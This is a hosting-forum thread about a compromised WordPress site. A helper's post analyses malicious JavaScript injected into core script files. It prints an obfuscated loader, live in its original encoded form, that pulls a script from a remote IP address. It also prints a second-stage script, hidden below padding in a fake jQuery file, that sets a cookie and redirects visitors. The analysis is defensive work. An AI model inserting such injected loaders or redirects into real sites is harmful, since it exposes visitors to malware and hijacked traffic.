All my pages turned white! HELP!

Status
Not open for further replies.
W

whenplay

New Member
Messages
1
Reaction score
0
Points
1
K

kenny9

Active Member
Messages
421
Reaction score
32
Points
28
When clicking onto the link to your site, I receive a virus alert from Avast. There is good chance your site is infected and is being blocked by x10's virus software.
 
C

caftpx10

Well-Known Member
Messages
1,534
Reaction score
114
Points
63
Your site had been compromised. The blank pages are returning HTTP 500. That would mean a fatal PHP error had occurred. In other words, your WordPress installation in this case is damaged in a way.

So far, two JavaScript files have been found serving obfuscated JavaScript:
Code: 
http://whencaniwatch.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
http://whencaniwatch.com/wp-includes/js/wp-emoji-release.min.js?ver=4.7.10
According to Google, both files have in the past been caught serving malicious code. Especially 'wp-emoji-release.min.js'.

(The rest of this post is the analysis of the code, for anyone interested. Also Cloudflare keeps bringing up a ReCaptcha when saving a draft because of the content.)

Both serve the following:
Code: 
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));
When we further undo this...
Code: 
document['write']('>tpircs/<>"sj.yreuqj/87[.]611[.]942[.]431//:ptth"=crs tpircs<' ['split']('')['reverse']()['join'](''));
So far, we call tell that there is a reversed string and document.write would be used to write it out onto the page once the string had been reversed again.
Once we reverse the string...
Code: 
<script src="http://134[.]249[.]116[.]78/jquery.js"></script>
So, cool. We've got it. There's more to it, however.
When we check out the URL, the file begins with this comment.
Code: 
/*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */
But then there are a ton of line breaks following that just so that we think that is all to it. If we scroll all the way down, this is shown...
Code: 
var _0x481b=["\x67\x65\x74\x54\x69\x6D\x65","\x73\x65\x74\x54\x69\x6D\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x3B\x20\x70\x61\x74\x68\x3D","","\x69\x6E\x64\x65\x78\x4F\x66","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x3B","\x63\x6F\x6F\x6B\x69\x65\x45\x6E\x61\x62\x6C\x65\x64","\x63\x73\x72\x66\x5F\x75\x69\x64\x73","\x31","\x2F","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x68\x69\x62\x69\x64\x73\x31\x30\x2E\x63\x6F\x6D\x2F\x77\x61\x74\x63\x68\x3F\x6B\x65\x79\x3D\x37\x38\x39\x61\x34\x31\x32\x39\x65\x37\x38\x63\x30\x30\x30\x30\x38\x61\x34\x37\x62\x33\x36\x65\x32\x33\x64\x36\x35\x65\x61\x37"];function _mmm_(_0x6d1dx2,_0x6d1dx3,_0x6d1dx4,_0x6d1dx5){var _0x6d1dx6= new Date();var _0x6d1dx7= new Date();if(_0x6d1dx4=== null|| _0x6d1dx4=== 0){_0x6d1dx4= 3};_0x6d1dx7[_0x481b[1]](_0x6d1dx6[_0x481b[0]]()+ 3600000* 24* _0x6d1dx4);document[_0x481b[2]]= _0x6d1dx2+ _0x481b[3]+ escape(_0x6d1dx3)+ _0x481b[4]+ _0x6d1dx7[_0x481b[5]]()+ ((_0x6d1dx5)?_0x481b[6]+ _0x6d1dx5:_0x481b[7])}function _nnn_(_0x6d1dx9){var _0x6d1dxa=document[_0x481b[2]][_0x481b[8]](_0x6d1dx9+ _0x481b[3]);var _0x6d1dxb=_0x6d1dxa+ _0x6d1dx9[_0x481b[9]]+ 1;if((!_0x6d1dxa) && (_0x6d1dx9!= document[_0x481b[2]][_0x481b[10]](0,_0x6d1dx9[_0x481b[9]]))){return null};if(_0x6d1dxa==  -1){return null};var _0x6d1dxc=document[_0x481b[2]][_0x481b[8]](_0x481b[11],_0x6d1dxb);if(_0x6d1dxc==  -1){_0x6d1dxc= document[_0x481b[2]][_0x481b[9]]};return unescape(document[_0x481b[2]][_0x481b[10]](_0x6d1dxb,_0x6d1dxc))}if(navigator[_0x481b[12]]){if(_nnn_(_0x481b[13])== 1){}else {_mmm_(_0x481b[13],_0x481b[14],_0x481b[14],_0x481b[15]);window[_0x481b[17]][_0x481b[16]]= _0x481b[18]}}
More obfuscated JavaScript code. Great. That looks like a mess so lets make it more readable...
Code: 
function _mmm_(_0x6d1dx2, _0x6d1dx3, _0x6d1dx4, _0x6d1dx5) {
    var _0x6d1dx6 = new Date();
    var _0x6d1dx7 = new Date();
    if (_0x6d1dx4 === null || _0x6d1dx4 === 0) {
        _0x6d1dx4 = 3
    };
    _0x6d1dx7['setTime'](_0x6d1dx6['getTime']() + 3600000 * 24 * _0x6d1dx4);
    document['cookie'] = _0x6d1dx2 + '=' + escape(_0x6d1dx3) + ';expires=' + _0x6d1dx7['toGMTString']() + ((_0x6d1dx5) ? '; path=' + _0x6d1dx5 : '')
}

function _nnn_(_0x6d1dx9) {
    var _0x6d1dxa = document['cookie']['indexOf'](_0x6d1dx9 + '=');
    var _0x6d1dxb = _0x6d1dxa + _0x6d1dx9['length'] + 1;
    if ((!_0x6d1dxa) && (_0x6d1dx9 != document['cookie']['substring'](0, _0x6d1dx9['length']))) {
        return null
    };
    if (_0x6d1dxa == -1) {
        return null
    };
    var _0x6d1dxc = document['cookie']['indexOf'](';', _0x6d1dxb);
    if (_0x6d1dxc == -1) {
        _0x6d1dxc = document['cookie']['length']
    };
    return unescape(document['cookie']['substring'](_0x6d1dxb, _0x6d1dxc))
}
if (navigator['cookieEnabled']) {
    if (_nnn_('csrf_uids') == 1) {} else {
        _mmm_('csrf_uids', '1', '1', '/');
        window['location']['href'] = 'http://www[.]hibids10[.]com/watch?key=789a4129e78c00008a47b36e23d65ea7'
    }
}
The code above sets a new cookie. Does a few checks regarding cookies and then redirects to this 'hibids10' domain. From there, there are additional redirects.
Search for "789a4129e78c00008a47b36e23d65ea7" on Google. This is not a new thing. Other WordPress installations had been compromised either because the version of WordPress used itself is vulnerable or there is a vulnerable plugin. Previously the domain beginning with 'cpm20' was used.
 
Status
Not open for further replies.
Top